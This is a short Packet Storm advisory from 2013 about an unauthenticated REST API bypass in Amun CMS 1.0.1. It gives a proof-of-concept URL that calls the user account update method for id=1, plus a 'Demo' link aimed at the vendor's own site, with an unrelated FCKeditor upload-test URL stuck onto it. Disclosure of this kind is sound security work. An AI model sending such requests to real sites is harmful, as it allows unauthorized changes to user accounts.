Amun CMS 1.0.1 REST API Access Bypass

2013-10-11T00:00:00
ID PACKETSTORM:123586
Type packetstorm
Reporter syst3m_f4ult
Modified 2013-10-11T00:00:00

Description

                                        
                                            `Amun CMS 1.0.1 REST API No Access Restriction  
  
Author : syst3m_f4ult  
Homepage : http://amun-project.org  
Vendor : Amun CMS  
Version : 1.0.1 (probably all versions)  
Tested on : ubuntu 12.04  
Date : 2013-10-11  
-----------------------------------------------------------------------  
I. POC & Exploit  
-----------------------------------------------------------------------  
Default : http://127.0.0.1/  
  
exploit : http://127.0.0.1/  
index.php/api/user/account/form?format=xml&method=update&id=1  
  
Demo :  
http://amun-project.org/index.php/api/user/account/form?format=xml&method=update&id=1<http://demo-en.automne.ws/automne/fckeditor/editor/filemanager/connectors/uploadtest.html>  
`